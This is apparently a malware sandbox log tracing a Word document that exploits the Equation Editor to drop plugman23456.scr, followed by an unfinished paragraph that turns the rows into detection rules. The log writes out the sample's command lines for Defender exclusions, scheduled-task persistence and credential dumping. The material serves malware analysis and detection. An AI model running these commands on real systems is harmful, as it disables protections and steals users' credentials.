                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........._.........................s............x....... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................%_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................7_.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................C_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....U_.........................s............x.......$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................e_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................._.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................._.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............x.......2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................._.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........_.........................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................4........_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........`.........................s............x...............................
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ............................K........................................ .............................
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P..............................K..............................................j.......x...............
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSystem information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: plugman23456.scr, plugman23456.scr, 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp  Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp  Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp  Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp  Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: Offer ZI-0428.doc  ReversingLabs: Detection: 47%
                  Source: Offer ZI-0428.doc  Virustotal: Detection: 40%
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Evasive API call chain: __getmainargs,DecisionNodes,exit graph_22-33246
                  Source: unknown  Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Process created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Process created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"
                  Source: unknown  Process created: C:\Windows\System32\taskeng.exe taskeng.exe {8CF74EAD-4204-4C1F-8614-11C7F9468804} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                  Source: C:\Windows\System32\taskeng.exe  Process created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpE15.tmp"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Process created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Process created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\ejlrnu"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Process created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\odrcnntyd"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Process created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: wow64win.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: wow64cpu.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: msi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: rpcrtremote.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: dwmapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: version.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: secur32.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: winhttp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: webio.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: iphlpapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: winnsi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: dnsapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: nlaapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: dhcpcsvc6.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: dhcpcsvc.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: ktmw32.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: shcore.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: webio.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\taskeng.exe  Section loaded: ktmw32.dll
                  Source: C:\Windows\System32\taskeng.exe  Section loaded: wevtapi.dll
                  Source: C:\Windows\System32\taskeng.exe  Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\taskeng.exe  Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\taskeng.exe  Section loaded: xmllite.dll
                  Source: C:\Windows\System32\taskeng.exe  Section loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: ktmw32.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: rpcrtremote.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: atl.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: pstorec.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: atl.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: mozglue.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: dbghelp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: msvcp140.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: vcruntime140.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: ucrtbase.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: shcore.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: wow64win.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: wow64cpu.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: msi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: rpcrtremote.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Section loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                  Source: Offer ZI-0428.LNK.0.dr  LNK file: ..\..\..\..\..\Desktop\Offer ZI-0428.doc
                  Source: Window Recorder  Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
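                  The process and module rows above are the ones a detection engineer would turn into rules: the Equation Editor (EQNEDT32.EXE) has no legitimate reason to start a .scr from AppData\Roaming; a fresh binary running powershell.exe Add-MpPreference -ExclusionPath on its own path is disabling Defender for itself; schtasks.exe /Create with /XML pointing into AppData\Local\Temp registers persistence from a throw-away task definition; a process re-launching its own image with /stext "<Temp file>" (the save-as-text switch of the NirSoft-derived recovery tools Remcos embeds) is dumping credentials to disk; and mozglue.dll or pstorec.dll appearing in a process that is not Firefox or Thunderbird means a foreign process is opening the browser's credential store. The Python below is an added example, not part of the Joe Sandbox report or its Sigma rule set: it encodes those five checks as functions over a constructed event list re-typed from the rows above. The event dicts, rule names, the nss3.dll and browser-host names, and the one -EncodedCommand variant (added to show the base64 path, since real samples often hide the 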